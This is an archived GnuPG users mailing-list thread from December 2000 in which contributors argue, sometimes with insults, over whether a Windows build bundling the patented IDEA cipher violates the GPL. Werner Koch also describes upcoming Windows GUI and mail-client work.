(harmless :) compiler warning. > > I'm not familiar at all with NLS, it may be better to ifdef this line and > > add the corresponding configure test. > > Could you tell us the warning? miscutil.c doesn't use anything which > is normally declared or defined in . I don't recall the exact warning message, and it's harmless anyway. char *nl_langinfo __P((nl_item)); The compiler thinks that nl_item is a parameter name, but it's really a type defined in nl_types.h. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From aphex@nullify.org Sat Dec 23 20:06:41 2000 From: aphex@nullify.org (Keith Ray) Date: Sat, 23 Dec 2000 14:06:41 -0600 (CST) Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001218140534.E12265@gnupg.de> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> Message-ID: <977602001.3a4505d13e702@nullify.org> Quoting Werner Koch : > On Fri, 15 Dec 2000, Keith Ray wrote: > > > I have been able to successfully cross-compile GnuPG 1.0.4-1 to > include the > > IDEA cipher for Windows. Since this binary now includes both RSA and > IDEA, it > > should be fully backwards compatible with PGP 2.6.x. > > > > The following changes were made from a "standard" cross-compile: > > 1. Statically linked idea.c. Unlike Cygwin, this release requires no > DLLs. > > By releasing this software you are violating the GPL: > Can I get a cease-and-desist letter on FSF letterhead, please? -------------------------------------------------------------------- Keith Ray aphex@nullify.org http://www.nullify.org PGP - 0xAE1B3529 - 8227 60E5 BAA5 9461 CAB3 A6F2 4DFE F573 AE1B 3529 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From evangelo@pigdog.org Sun Dec 24 03:22:22 2000 From: evangelo@pigdog.org (ESP) Date: 23 Dec 2000 19:22:22 -0800 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: Keith Ray's message of "Sat, 23 Dec 2000 14:06:41 -0600 (CST)" References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> Message-ID: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> >>>>> "KR" == Keith Ray writes: KR> Can I get a cease-and-desist letter on FSF letterhead, please? Why waste everybody's time and be a humongous dickhead? You know now why IDEA was not included in GnuPG, you're doing something that is going to draw lightning to yourself and GnuPG eventually, and there's no good reason for it. Do you have a point you're trying to prove? Like, "Screw you for making this nice program for me."? "Go to hell, FSF and Werner Koch, for having thought through the issues about GnuPG and IDEA much more than I have."? I can't really see one. There's not some Goliath here that you can play David to, man. Please act like an adult and take down your binary. ~ESP -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESP | http://pigdog.org/ "Fan belts break at 3AM. I get mad, drinks get spilled." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From peter@palfrader.org Fri Dec 22 22:20:55 2000 From: peter@palfrader.org (Peter Palfrader) Date: Fri, 22 Dec 2000 23:20:55 +0100 Subject: majordomo? In-Reply-To: <20001214204456.R23140@gnupg.de>; from wk@gnupg.org on Thu, Dec 14, 2000 at 20:44:56 +0100 References: <3A391962208.0E19RICH@mail.dreamscape.com> <20001214204456.R23140@gnupg.de> Message-ID: <20001222232055.A3869@marvin.palfrader.org> --/9DWx/yDrRhgMJTb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi Werner! On Thu, 14 Dec 2000, Werner Koch wrote: > On Thu, 14 Dec 2000, Rich wrote: >=20 > > Is majordomo@gnupg.org working? >=20 > I hope not. There should be no majordomo but a smartlist thing. I > thing I removed the autoresponder which told users, that there is no > Majordomo. IIRC the Debian Project also uses smartlist and Joey[1] (or someone else) hacked up a majordomo -> smartlist translator so that commands to majordomo@d.o work as expected. Maybe this could be installed on gnupg.org too? yours, peter 1. joey@debian.org --=20 PGP signed and encrypted messages preferred. http://www.palfrader.org/ --/9DWx/yDrRhgMJTb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Q9PH3nqvbpTAnH8RAsNfAKCGuN8XoZ0acamdC6m7h9b+IxZBawCgptvP E/Yp+zkn0Y6YVkXQYNA6Vqc= =MOqq -----END PGP SIGNATURE----- --/9DWx/yDrRhgMJTb-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From aphex@nullify.org Sun Dec 24 07:18:04 2000 From: aphex@nullify.org (Keith Ray) Date: Sun, 24 Dec 2000 01:18:04 -0600 (CST) Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> Message-ID: <977642284.3a45a32c931d3@nullify.org> Quoting ESP : > >>>>> "KR" == Keith Ray writes: > > KR> Can I get a cease-and-desist letter on FSF letterhead, please? > > Why waste everybody's time and be a humongous dickhead? You know now > why IDEA was not included in GnuPG, you're doing something that is > going to draw lightning to yourself and GnuPG eventually, and there's > no good reason for it. I guess that's why no one has EVER asked for an IDEA capable Windows version? I guess there are no Windows users who might want to communicate with PGP 2.6x users or use most remailers? > Do you have a point you're trying to prove? Like, "Screw you for > making this nice program for me."? "Go to hell, FSF and Werner Koch, > for having thought through the issues about GnuPG and IDEA much more > than I have."? I can't really see one. I am not trying to prove a point. I merely wish to allow those who want a GnuPG+IDEA binary to be able to have one. I give it away free and provide source. Isn't that the point of Free Software? If commercial users don't want it, they can download the official release. But for all noncommercial users, there is NO reason why they shouldn't be able to have IDEA support. > There's not some Goliath here that you can play David to, man. Please > act like an adult and take down your binary. The no patents clause of the GPL is stupid! Why can't we provide TWO versions and let the users decide which best meets there needs? The unix users have had this choice for some time, why are the Window's users less deserving? I am not taking anything away from Werner or anyone else. So it's real simple. Either leave me alone and let the users decide which version they want, or force me to stop. I am not trying to steal anyone's work or make money off it. I am merely adding some much requested functionality. -------------------------------------------------------------------- Keith Ray aphex@nullify.org http://www.nullify.org PGP - 0xAE1B3529 - 8227 60E5 BAA5 9461 CAB3 A6F2 4DFE F573 AE1B 3529 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Sun Dec 24 08:59:54 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Sun, 24 Dec 2000 08:59:54 GMT Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <977642284.3a45a32c931d3@nullify.org> References: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> Message-ID: <20001224083816.75F5.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Keith Ray, On 24 December 2000, I received the following message from you regarding "GnuPG 1.0.4-1 + IDEA for Windows" KR> I guess that's why no one has EVER asked for an IDEA capable Windows version? KR> I guess there are no Windows users who might want to communicate with PGP 2.6x KR> users or use most remailers? As a Windows user of GnuPG, I use PGP 2.6.3ai to access remailers, as well as running GnuPG. The PGP 2.6.3ai keyring contains mainly remailers (this keeps them off my main keyring). I use Windows front ends for both GnuPG and PGP 2.6.3ai, and if GnuPG fails to decrypt/verify, I use PGP 2.6.3ai. For convenience, it would be nice if GnuPG could be used for this purpose, but it would mean importing my remailer list into my GnuPG keyring, so not much would be saved by my doing this. KR> > Do you have a point you're trying to prove? Like, "Screw you for KR> > making this nice program for me."? "Go to hell, FSF and Werner Koch, KR> > for having thought through the issues about GnuPG and IDEA much more KR> > than I have."? I can't really see one. KR> KR> I am not trying to prove a point. I merely wish to allow those who want a KR> GnuPG+IDEA binary to be able to have one. I give it away free and provide KR> source. Isn't that the point of Free Software? If commercial users don't want KR> it, they can download the official release. But for all noncommercial users, KR> there is NO reason why they shouldn't be able to have IDEA support. I agree, but perhaps the way forward is for the Windows version to be placed on the same level as the Linux version, and the IDEA support should be an "official" plug-in for non-commercial use only. Until we have a fully functional GnuPG with a GUI similar to NAI's, GnuPG is going to be a Windows backwater...unfortunately. KR> > There's not some Goliath here that you can play David to, man. Please KR> > act like an adult and take down your binary. KR> KR> The no patents clause of the GPL is stupid! Why can't we provide TWO versions KR> and let the users decide which best meets there needs? The unix users have had KR> this choice for some time, why are the Window's users less deserving? I am not KR> taking anything away from Werner or anyone else. KR> KR> So it's real simple. Either leave me alone and let the users decide which KR> version they want, or force me to stop. I am not trying to steal anyone's work KR> or make money off it. I am merely adding some much requested functionality. Again, I agree, but see my comments above. GnuPG needs to be more Windows-friendly, and I feel that Windows OS is being supported almost as an afterthought (I mean no disrespect to Werner here). First, we need a GUI that rivals PGP *without* recourse to the command line, as this will make more Windows users look at the undoubted merits (even superiority) of GnuPG. Secondly, we need full keyserver support through that GUI. Finally, we need IDEA support as an official plug-in, as with Linux. Any chance of any of these occurring soon....? Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 24 December 2000 08:38:16 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) Comment: For info see http://www.gnupg.org iD8DBQE6Rbr8LuLY+pnbEL0RAvwUAJ91iGKrSweVaYITllgz3Vkt4Dq2YgCgnqm1 Xu5Hm1UyknoR/kTB2IDnCu8= =rcF1 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Sun Dec 24 11:44:03 2000 From: wk@gnupg.org (Werner Koch) Date: Sun, 24 Dec 2000 12:44:03 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001224083816.75F5.GRAHAM@todd276.worldonline.co.uk>; from graham@todd276.worldonline.co.uk on Sun, Dec 24, 2000 at 08:59:54AM +0000 References: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <20001224083816.75F5.GRAHAM@todd276.worldonline.co.uk> Message-ID: <20001224124403.Q32206@gnupg.de> On Sun, 24 Dec 2000, Graham wrote: > Again, I agree, but see my comments above. GnuPG needs to be more > Windows-friendly, and I feel that Windows OS is being supported almost > as an afterthought (I mean no disrespect to Werner here). First, we No. I am very used to write portable programs and if you look at the source, there is not much difference between the Windows and the GNU source code. I have decided to use GTK+ to write GUI, so that it can be be easly "ported" to Windows. And actually it was really easy in the beginning. Later it turned out that some subtle problems with piping under Windows have to be solved and I hope I did this meanwhile with GPGME. So, there is just one source code. Timo's WinPT is a pretty nice tools wich is moving repidly forward and we will soon have something similiar to NAI's PGP. A nice installer should be ready in early January. > superiority) of GnuPG. Secondly, we need full keyserver support TIMO has implemnted this in WinPT and doing that for GnuPG is just some minor (but boring) coding. I'll do this as soon as I find the time for it or someone contributes the changes (hint, hint). > through that GUI. Finally, we need IDEA support as an official plug-in, am not going to distribuite it, but I already promised that the extension mechanism will work in th next version and you can already find the pacthes inthe ML archive. With the extension stuff, we have the same situation as under Unix and so this "problem" should go away. BTW, I am hacking on Sylpheed (a very nice grahical MUA) and I have some reason to believe that I can port it to Windows (I can already run it and set the preferences). Then you will have a real nice Windows MUA with full MIME support. Another chance for a nice MUA is Mahogany; the only problem I see is that it uses the plain Artistic license and we are not sure whether it is really a free license and compatible to the GPL - we have asked the authors, but they didn't respond. These MUAs are just a temporary solution until we are ready to bring full support to Outlook. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From johanw@vulcan.xs4all.nl Sun Dec 24 13:01:28 2000 From: johanw@vulcan.xs4all.nl (Johan Wevers) Date: Sun, 24 Dec 2000 14:01:28 +0100 (MET) Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> from ESP at "Dec 23, 2000 07:22:22 pm" Message-ID: <200012241301.OAA02521@vulcan.xs4all.nl> ESP wrote to Keith Ray: > Why waste everybody's time and be a humongous dickhead? You know now > why IDEA was not included in GnuPG, you're doing something that is > going to draw lightning to yourself and GnuPG eventually, and there's > no good reason for it. I just read the patent issue in the GPL. I'm not sure how this is supposed to work, it doesn't say anything about where the patent need to be acknowledged for example. I'm asking because software patents are (fortunately) not given in the EC, recently they turned down a proposal from the patent lobby to do so. If, say, some obscure dictator in some banana republic claims that all public-key crypto is patented to him in that country, would that formally exclude any public-key crypto from being distributed under the GPL? BTW, the same situation exists with the gif format: the claimed patent does not hold in many countries, like mine. I'm not sure about the IDEA patent, but I don't feel like obeying the stupid laws of other countries when I'm not there. > Do you have a point you're trying to prove? Like, "Screw you for > making this nice program for me."? I don't think so, I think Keith can do something and get away with it that could cause Werner, in his position, serious problems. If Werner can proove to any patent-claimers that he isn't involved with Keith's version his ass is covered. -- ir. J.C.A. Wevers // Physics and science fiction site: johanw@vulcan.xs4all.nl // http://www.xs4all.nl/~johanw/index.html PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Sun Dec 24 15:23:00 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Sun, 24 Dec 2000 15:23:00 GMT Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001224124403.Q32206@gnupg.de> References: <20001224083816.75F5.GRAHAM@todd276.worldonline.co.uk> <20001224124403.Q32206@gnupg.de> Message-ID: <20001224151200.BD90.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Werner, On 24 December 2000, I received the following message from you regarding "GnuPG 1.0.4-1 + IDEA for Windows" Thank you for the detailed explanation...and I hope something materialises soon, as you are obviously doing a great job, Werner. Yes, I agree about Timo's GUI...its coming along really well. All power to his elbow! WK>These MUAs are just a temporary solution until WK> we are ready to bring full support to Outlook. To Outlook? Well, I guess you must start somewhere, but Outlook and Outlook Express are generally reckoned to be the vehicles for the carriers of so many viruses under Windows, that I hope full support will come in the way of plug-ins which will interface GnuPG with MUAs other than the Microsoft apps and Eudora..... Again, please accept my thanks for all the help you have given me and other Windows users in 2000..... and I wish you and your family a Merry Christmas and a productive New Year! Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 24 December 2000 15:12:00 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) Comment: Please use my key ID: 0x99DB10BD iD8DBQE6RhTGLuLY+pnbEL0RAjSIAKCe3VRlpoCpWMJpdeu9tboMrDifWwCg/YzR a/pTGFdUTiE6S8dlEErokgyIPwMFATpGFMYu4tj6mdsQvRECNIgAnR9DY998B6VL Xe7oic2pxTfdVhozAKDoYA7VQDAp5vTiVcos3W4kN5q6Rg== =QIVt -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Sun Dec 24 15:53:33 2000 From: rich@cnylug.org (Rich) Date: Sun, 24 Dec 2000 10:53:33 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows and more In-Reply-To: References: <20001224124403.Q32206@gnupg.de> Message-ID: <3A461BFD230.3414RICH@mail.dreamscape.com> Well, now that Werner has added the code that allows the Win32 version to access modules like the IDEA module, why is the version with it statically compiled even needed? Once Werner releases 1.05 it's a done deal. Users will be able to use IDEA seamlessly without even a HINT of violating the GPL. So for that guy (whose name escapes me at the moment) to even keep his version around seems a little suspect. And on another note, I would like to thank Werner for all of his tireless (and usually thankless) programming efforts and wish him and everyone else here Happy Holidays! Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@xxxcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From evangelo@pigdog.org Sun Dec 24 19:06:39 2000 From: evangelo@pigdog.org (ESP) Date: 24 Dec 2000 11:06:39 -0800 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: Keith Ray's message of "Sun, 24 Dec 2000 01:18:04 -0600 (CST)" References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> Message-ID: <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> >>>>> "KR" == Keith Ray writes: KR> I guess that's why no one has EVER asked for an IDEA capable KR> Windows version? I guess there are no Windows users who might KR> want to communicate with PGP 2.6x users or use most remailers? Well, we can't always get what we want, can we? This isn't a matter of design or functionality, it's a matter of the law. Why isn't that getting through to you? KR> I am not trying to prove a point. I merely wish to allow KR> those who want a GnuPG+IDEA binary to be able to have one. I KR> give it away free and provide source. Isn't that the point of KR> Free Software? If commercial users don't want it, they can KR> download the official release. But for all noncommercial KR> users, there is NO reason why they shouldn't be able to have KR> IDEA support. Yeah, except it's patented, and you're therefore breaking the GPL. KR> The no patents clause of the GPL is stupid! Whatever! Don't use the software if you don't agree to the license. And especially don't redistribute it! If you really strongly disagree with the GPL on this matter, why don't you build your own damn encryption system, put whatever patented crap you want in it, and distribute it? KR> Why can't we provide TWO versions and let the users decide KR> which best meets there needs? Well, at the very least, you're requiring some expensive lawyer time to get you to do something that you know you're going to have to do eventually. What good does that do? KR> The unix users have had this choice for some time, why are the KR> Window's users less deserving? I am not taking anything away KR> from Werner or anyone else. You know, that's not for us to decide. It's the patent holder that's decided it, and there is a work-around already. http://www.gnupg.org/gph/en/pgp2x.html The workaround is there because of the patents. KR> So it's real simple. Either leave me alone and let the users KR> decide which version they want, or force me to stop. I am not KR> trying to steal anyone's work or make money off it. No, you're just being confrontational and obnoxious with someone who's given you a gift. That's got to be the most dickheaded thing in the world. Werner and tons of other people worked REAL HARD to make GnuPG for you. They've done a lot to give you absolutely free encryption. And they even did everything they could within the bounds of the law to make it work with PGP. They've thought it through more than you. They gave you the software for FREE, under some very easy terms (the GPL). You are breaking those terms and acting like you're being put upon. Creep. KR> I am merely adding some much requested functionality. ...which is not in there for a very good reason. God, you're an ass. ~ESP -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESP | http://pigdog.org/ "Fan belts break at 3AM. I get mad, drinks get spilled." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Sun Dec 24 19:18:27 2000 From: rich@cnylug.org (Rich) Date: Sun, 24 Dec 2000 14:18:27 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <3kwbnD.A.4eB.UlkR6@mail.hsp.de> References: <977642284.3a45a32c931d3@nullify.org> <3kwbnD.A.4eB.UlkR6@mail.hsp.de> Message-ID: <3A464C03C8.518ARICH@mail.dreamscape.com> Hello all, and happy holidays. While I agree that this person should not be distributing a GnuPG version that is in violation of the GPL, While I'm not certain that this is necessarily the best forum for argue the point, I am certain that this isn't the time of year to do it! :-) If Werner isn't constantly being asked for a GnuPG library he's having to see this kind of thing in his forums. :-) I think the best solution to this problem is to let that guy (whose name once again escapes me) do his thing, and let Werner do his thing and let the chips fall where they may. We really don't have the power to make that guy STOP compiling his version of GnuPG with IDEA compiled in, so why argue about it? If in the future the IDEA patent holders wish to go after him or the FSF, they will. There are plenty of witnesses that will testify that the official version does not contain IDEA so I think Werner is safe from a legal perspective. I hope everyone gets that Quad CPU box with 1-gig of RAM that they've been wanting! :-) Happy Holidays! Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From mhw@wittsend.com Sun Dec 24 22:16:21 2000 From: mhw@wittsend.com (Michael H. Warfield) Date: Sun, 24 Dec 2000 17:16:21 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us>; from evangelo@pigdog.org on Sun, Dec 24, 2000 at 11:06:39AM -0800 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> Message-ID: <20001224171621.C4668@alcove.wittsend.com> On Sun, Dec 24, 2000 at 11:06:39AM -0800, ESP wrote: > Yeah, except it's patented, and you're therefore breaking the GPL. Yes, and you are still ignoring the issue of "what jurisdiction?" This is perfectly and completely legal in the EC. So he can get it hosted in the EC and not violate the GPL? If that is violating the GPL, what's stopping some banana republic from claiming XOR is patented (it was, by Xerox)? > KR> The no patents clause of the GPL is stupid! > Whatever! Don't use the software if you don't agree to the > license. And especially don't redistribute it! The patents clause of the GPL is invalid simply because it doesn't address the issue of jurisdiction. With that clause in place, we either have software which is GPL in some countries and not in either, or we say that any patent anywhere applies which places the GPL hostage to any past, present or future patent scheme in any country in the world, or we say that one countrie's jurisdiction applies to the entire world. (The US applying to EC, yeah right... They'll be singing Jingle Bells in hades.) I agree with other posters. This is NOT an issue for this list. This is an issue for Ascom and FSF (and far FAR more for Ascom than FSF). If they do not wish to take action, we have no place in bitching. If they wish to permit it for those people who take them up on their offer of noncommercial licenses, that's fine too. Not for us to say. > If you really strongly disagree with the GPL on this matter, why don't > you build your own damn encryption system, put whatever patented crap > you want in it, and distribute it? He has meet the letter of the GPL as applied in the EC. If it doesn't apply in the US, fine. Distribute it from one of the .nl crypto sites. Replay changed names and is now what, zedz.net? Upload it to zedz.net and be done with it! What are you going to do then? It meets the full letter of the GPL. Idea is NOT patented in that jurisdiction. > KR> Why can't we provide TWO versions and let the users decide > KR> which best meets there needs? > Well, at the very least, you're requiring some expensive lawyer time > to get you to do something that you know you're going to have to do > eventually. What good does that do? > KR> The unix users have had this choice for some time, why are the > KR> Window's users less deserving? I am not taking anything away > KR> from Werner or anyone else. > You know, that's not for us to decide. It's the patent holder that's > decided it, and there is a work-around already. > http://www.gnupg.org/gph/en/pgp2x.html You're right! It is up to the patent holder, which does not exist in Europe, since the patent doesn't exist in Europe. > The workaround is there because of the patents. > KR> So it's real simple. Either leave me alone and let the users > KR> decide which version they want, or force me to stop. I am not > KR> trying to steal anyone's work or make money off it. > No, you're just being confrontational and obnoxious with someone who's > given you a gift. That's got to be the most dickheaded thing in the > world. You are both being obnoxious. Correct me if I'm wrong, but didn't you call him a dick head? And your are calling HIM obnoxious? Sounds like you both need some growing up to do. > Werner and tons of other people worked REAL HARD to make GnuPG for > you. They've done a lot to give you absolutely free encryption. And > they even did everything they could within the bounds of the law to > make it work with PGP. They've thought it through more than you. > They gave you the software for FREE, under some very easy terms (the > GPL). You are breaking those terms and acting like you're being put > upon. Creep. DISTRIBUTE THE DAMN THING FROM EUROPE! There is no patent on Idea in Europe. There are plenty of sites in Europe from which to distribute it. It is perfectly legal and, until the GPL codifies US patent law in all things GPL, conforms to the GPL in that jurisdiction. What the rest of us do with it is up to us. > KR> I am merely adding some much requested functionality. > ...which is not in there for a very good reason. God, you're an ass. YOU BOTH ARE! You just got done telling him that he's offensive. Why don't you read your own postings as if you were the other person. Right now, I'm not sure which of the two of you is more offensive!!!! > ~ESP My 0.02 euro. > -- > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ESP | http://pigdog.org/ > "Fan belts break at 3AM. I get mad, drinks get spilled." > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From mhw@wittsend.com Mon Dec 25 06:30:36 2000 From: mhw@wittsend.com (Michael H. Warfield) Date: Mon, 25 Dec 2000 01:30:36 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001224171621.C4668@alcove.wittsend.com>; from mhw@wittsend.com on Sun, Dec 24, 2000 at 05:16:21PM -0500 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <20001224171621.C4668@alcove.wittsend.com> Message-ID: <20001225013036.A2009@alcove.wittsend.com> Followup, after I reread the GPL yet AGAIN... On Sun, Dec 24, 2000 at 05:16:21PM -0500, Michael H. Warfield wrote: > The patents clause of the GPL is invalid simply because it doesn't > address the issue of jurisdiction. With that clause in place, we either > have software which is GPL in some countries and not in either, or we > say that any patent anywhere applies which places the GPL hostage to > any past, present or future patent scheme in any country in the world, > or we say that one countrie's jurisdiction applies to the entire world. > (The US applying to EC, yeah right... They'll be singing Jingle Bells > in hades.) Ok... I blew it. The GPL has specific provisions for distribution in the case of patents enforced in certain geographical areas. ] 8. If the distribution and/or use of the Program is restricted in ] certain countries either by patents or by copyrighted interfaces, the ] original copyright holder who places the Program under this License ] may add an explicit geographical distribution limitation excluding ] those countries, so that distribution is permitted only in or among ] countries not thus excluded. In such case, this License incorporates ] the limitation as if written in the body of this License. Ok... That sounds like a way out of the box, doesn't it. Add a message stating the geographical distribution. Of course, the section says "may add". That's interesting in that we now have a dilema. If the GPL prohibits any and all patented technology, then this passage is simply gibberish. You could never HAVE any such qualifying software, if the very thing itself was prohibited. If it is NOT truely prohibited, as section 8 implies, then the original copyright holder is only obligated under a "may" and not even a "should" much less a "must". To use IETF delineations of nominclature, "must" implies something that is required, while "should" is something recommended and "may" is something permitted. So section 8 of the GPL as it is included with GnuPG states that if a program (implied to be under the GPL or why would we be discussing this) is restricted by patents (implying that GPL software might be restricted by patents) then the author is permitted (may) to add a restriction on distribution. It would appear that sections 7 and 8 are in direct conflict with each other. How can you even have section 8 if an allegation of patent infringement means that you must refrain entirely from distribution. Looks like we have an RMS paradox here. It's pretty clear that if patents were excluded from GPL software, section 8 would be superfluous. If section 8 is NOT superfluous, then patents are permitted in GPL software (even patents without universally free access as described elsewhere) and if the authors of the GPL had meant to REQUIRE an author to restrict distribution, they would have used other verbage in section 8. Section 8 exists and is worded "may". BTW... We now have a problem. Since it has been insisted that this can not be distributed because it contains the Idea algorithm and that algorithm is patented, there is something else in GnuPG which is patented. Hyperlinks. Yes folks, in case you have been living under a rock recently, British Telecom not only claims to hold a patent on Hyperlinking technology in general but they are also suing Prodigy for infringing on that patent in the US. With any decent luck (and a clueful judge) this will be thrown out for the rediculous non-sense that it is. ITMT, however, GnuPG contains hyperlinks in its README files and in the various html files and even in a few .c sources. Till it is thrown out in court, we could be held to be infringing. Even the extreme rediculous examples that people dream up can't hold a candle to reality. :-( Under section 7, we now have an allegation of infringement of the BT Hyperlink patent. Now we have a problem, even if all of us AGREE that the patent is rediculous, since the GPL says explicitly, "or allegation of patent infringement." You don't even have to be proven to be infringing and it says nothing about the legitimacy or sanity of the patent itself. It just says "or allegation". Under RMS writing, we are guilty until proven innocent. That's exactly what RMS is point out in this section of the GPL: ] Finally, any free program is threatened constantly by software ] patents. We wish to avoid the danger that redistributors of a free ] program will individually obtain patent licenses, in effect making the ] program proprietary. To prevent this, we have made it clear that any ] patent must be licensed for everyone's free use or not licensed at all. Well... According to BT, hyperlinking is not free to use without royalties (and they are hitting up several other ISP's for royalities as well). They constitute some small subset of "everyone". > > you want in it, and distribute it? > He has meet the letter of the GPL as applied in the EC. If it > doesn't apply in the US, fine. Distribute it from one of the .nl crypto > sites. Replay changed names and is now what, zedz.net? Upload it to > zedz.net and be done with it! What are you going to do then? It meets > the full letter of the GPL. Idea is NOT patented in that jurisdiction. Declare the distribution per the GPL and distribute it with that statement. Question becomes, what consitutes an explicit geographical distribution limitation? Obviously, a list of countries would qualify. Would a statement that "can be distributed with no limitations in any country where Idea is not patented" constitute an explicit geographical limitation? In most cases, it would. It states a testable definitive condition underwhich an explicit determination can be made. Works for me. > > KR> Why can't we provide TWO versions and let the users decide > > KR> which best meets there needs? > > Well, at the very least, you're requiring some expensive lawyer time > > to get you to do something that you know you're going to have to do > > eventually. What good does that do? Nope... Take the easy way out of the box. State the distribution and let the users sort it out, just like they did with the original pgp and the US export restrictions. Free for distribution in Europe and other countries not encumbered by software patents. Right there in the 